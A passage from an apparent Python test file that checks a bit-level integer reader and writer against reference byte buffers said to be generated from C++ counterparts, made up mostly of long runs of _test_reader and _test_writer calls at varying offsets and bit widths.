_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 13, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 12, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 11, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 10, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 9, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 8, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 7, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 6, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 5, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 4, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 3, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 2, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 1, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 64, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 63, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 62, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 61, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 60, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 59, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 58, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 57, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 56, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 55, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 54, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 53, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 52, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 51, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 50, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 49, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 48, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 47, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 46, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 45, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 44, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 43, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 42, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 41, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 40, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 39, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 38, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 37, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 36, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 35, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 34, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 33, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 32, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 31, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 30, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 29, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 28, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 27, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 26, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 25, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 24, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 23, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 22, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 21, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 20, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 19, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 18, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 17, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 16, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 15, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 14, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 13, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 12, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 11, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 10, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 9, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 8, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 7, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 6, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 5, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 4, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 3, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 2, False, 1)
_test_reader(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 1, False, 1)
_test_reader(b"\xf8\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -1)
_test_reader(b"\xf0\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -2)
_test_reader(b"\xe0\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -4)
_test_reader(b"\xc0\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -8)
_test_reader(b"\x80\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -16)
_test_reader(b"\x00\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -32)
_test_reader(b"\x00\xfe\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -64)
_test_reader(b"\x00\xfc\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -128)
_test_reader(b"\x00\xf8\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -256)
_test_reader(b"\x00\xf0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -512)
_test_reader(b"\x00\xe0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -1024)
_test_reader(b"\x00\xc0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -2048)
_test_reader(b"\x00\x80\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -4096)
_test_reader(b"\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -8192)
_test_reader(b"\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -16384)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 2)
_test_reader(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 4)
_test_reader(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 8)
_test_reader(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 16)
_test_reader(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 32)
_test_reader(b"\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 64)
_test_reader(b"\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 128)
_test_reader(b"\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 256)
_test_reader(b"\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 512)
_test_reader(b"\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 1024)
_test_reader(b"\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 2048)
_test_reader(b"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 4096)
_test_reader(b"\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 8192)
_test_reader(b"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 16384)
_test_reader(b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 2, True, 0)
def test_writer():
"""
Following tests were generated from C++ counterparts. Reasoning: python implementation lacks
writers at the moment, and adding them needs insurance that they will not diverge from their
C++ originals.
"""
def _test_writer(buffer, offset, num_bits, is_signed, expected):
    # Write the value into a zeroed buffer of the same size and check that
    # the result matches the reference bytes produced by the C++ writer.
    bout = bytearray(len(buffer))
    write_value(bout, offset, num_bits, is_signed, expected)
    assert_equal(bout, buffer)
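# For reference, a hypothetical writer consistent with the reader convention
# sketched in test_reader (an assumption for illustration only; the
# write_value under test is the implementation being validated against its
# C++ original): value bit k lands at buffer bit (offset + k), LSB-first
# within each byte, with values truncated to num_bits two's complement.
def _write_value_sketch(buf, offset, num_bits, is_signed, value):
    raw = value & ((1 << num_bits) - 1)  # truncation covers signed values too
    for k in range(num_bits):
        byte_i, bit_i = divmod(offset + k, 8)
        if (raw >> k) & 1:
            buf[byte_i] |= 1 << bit_i
        else:
            buf[byte_i] &= ~(1 << bit_i) & 0xFF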
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 8, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 7, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 6, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 5, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 4, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 3, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 2, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00", 8, 1, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 8, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 7, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 6, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 5, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 4, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 3, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 2, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 1, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 8, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 7, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 6, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 5, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 4, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 3, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 2, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 1, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 8, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 7, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 6, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 5, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 4, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 3, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 2, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 1, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 8, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 7, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 6, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 5, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 4, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 3, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 2, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 1, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 8, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 7, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 6, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 5, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 4, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 3, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 2, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 1, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 8, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 7, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 6, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 5, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 4, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 3, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 2, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 1, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 8, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 7, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 6, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 5, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 4, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 3, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 2, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 1, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 8, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 7, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 6, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 5, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 4, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 3, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 2, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00", 0, 1, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 16, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 15, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 14, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 13, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 12, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 11, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 10, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 9, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 8, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 7, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 6, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 5, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 4, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 3, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 2, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 1, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 16, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 15, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 14, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 13, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 12, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 11, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 10, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 9, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 8, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 7, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 6, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 5, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 4, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 3, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 2, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 1, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 16, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 15, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 14, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 13, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 12, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 11, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 10, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 9, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 8, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 7, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 6, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 5, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 4, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 3, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 2, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 1, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 16, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 15, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 14, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 13, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 12, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 11, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 10, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 9, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 8, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 7, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 6, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 5, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 4, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 3, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 2, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 1, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 16, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 15, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 14, False, 1)
